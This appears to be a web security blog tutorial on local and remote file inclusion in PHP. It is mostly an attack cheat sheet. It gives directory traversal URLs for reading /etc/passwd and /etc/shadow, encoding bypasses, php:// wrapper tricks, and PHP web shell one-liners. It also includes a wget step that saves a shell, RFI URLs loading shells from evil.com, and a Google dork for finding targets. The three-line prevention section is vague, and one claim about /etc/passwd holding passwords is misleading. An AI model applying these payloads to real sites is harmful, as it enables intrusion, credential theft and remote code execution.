LFI And RFI – The Website Security Vulnerabilities

LFI And RFI Vulnerabilities

LFI (Local File Inclusion) and RFI (Remote File Inclusion) – The Website Security Vulnerabilities

A File inclusion vulnerability is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.

A file include vulnerability is distinct from a generic Directory Traversal Attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file include vulnerability will result in remote code execution on the web server that runs the affected web application.

Local File Inclusion :

Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server’s access logs.

Example of LFI 

Type of call:
require($file);
Exploit:
http://host/?file=/etc/passwd

Type of call:
require(“includes/”.$file);
Exploit:
http://host/?file=../../../../../etc/passwd

Tpye of calls:
require(“languages/”.$lang.”.php”);
require(“themes/”.$theme.”/config.php”);
Exploit:
http://host/?file=../../../../../etc/passwd%00

Type of call:
require(“languages/”.$_COOKIE[‘lang’].”.php”);
Exploit:
javascript:document.cookie = “lan=../../../../../etc/passwd%00”;

That is to include the file of the server in our browser
<?php include($_GET[”]) ?>

Google dork: inurl:.php?page=
Example : www.xyz.com/contacts.php?page=abc.php
www.xyz.com/abc.php?id=5
test : www.xyz.com/contacts.php?page=../xyz.php

Now in linux server there is etc/passwd file which contain username and password of all the domains hosted on the same server
1… www.abc.org/index.php?page=../../../../etc/passwd%00
2… www.abc.com/index.php?page=../../../../etc/passwd

proc/self/environ is the writable file by the end user
or var/log/httpd-access.log is also writable
usr/local/apache/conf/httpd.conf —-> gives the path of all logs file
<?php passthru($_GET[‘cmd’]) ?>
<?php system($_GET[‘cmd’]) ?>
<?php exec($_GET[‘cmd’]) ?>
wget http://xyz.com/abc.txt -O shell.php

How to Test Local File Inclusion

Since LFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.

Consider the following example:

http://vulnerable_host/preview.php?file=example.html

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:

http://vulnerable_host/preview.php?file=../../../../etc/passwd

Remote File Inclusion:

Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

RFI – Remote file inclusion

If allow_url_include is On in php.ini, then we can inject a shell directly.

You only need to load by GET or POST directly to an URI with the shell (using a non PHP extension):
www.xyz.com/contacts.php?page=http://www.abc.com/shell.php

How To Test RFI

Since RFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example:

$incfile = $_REQUEST["file"];
include($incfile.".php");

In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a white list), so this snippet of code results vulnerable to this type of attack. Consider infact the following URL:

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

In this case the remote file is going to be included and any code contained in it is going to be run by the server.

Basic LFI (null byte, double encoding and other tricks) :

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

Interesting files to check out :

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

Basic RFI (null byte, double encoding and other tricks) :

http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

LFI / RFI Wrappers :

LFI Wrapper rot13 and base64 – php://filter case insensitive.

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

LFI Wrapper ZIP :

echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php; 
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

RFI Wrapper DATA with “” payload :

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

RFI Wrapper EXPECT :

http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls

XSS via RFI/LFI with “” payload :

http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

LFI to RCE via Upload :

http://example.com/index.php?page=path/to/uploaded/file.png

Miscellaneous PayLoads and Tricks

GET /page.php?path=../../etc/passwd

Forbidden 403 ?

Try One Of These:

(1)../../../etc/passwd%00

(2)….//….//….//etc/passwd

(3)%252e%252e%252fetc%252fpasswd

Prevention from LFI and RFI Attacks

  • Use Vulnerability Scanners
  • Use Web Application Firewall (WAF)
  • Fix your code to secure.

References:
OSINT, Wikipedia, Github, Twitter

Join Our Club

Enter your Email address to receive notifications | Join over Million Followers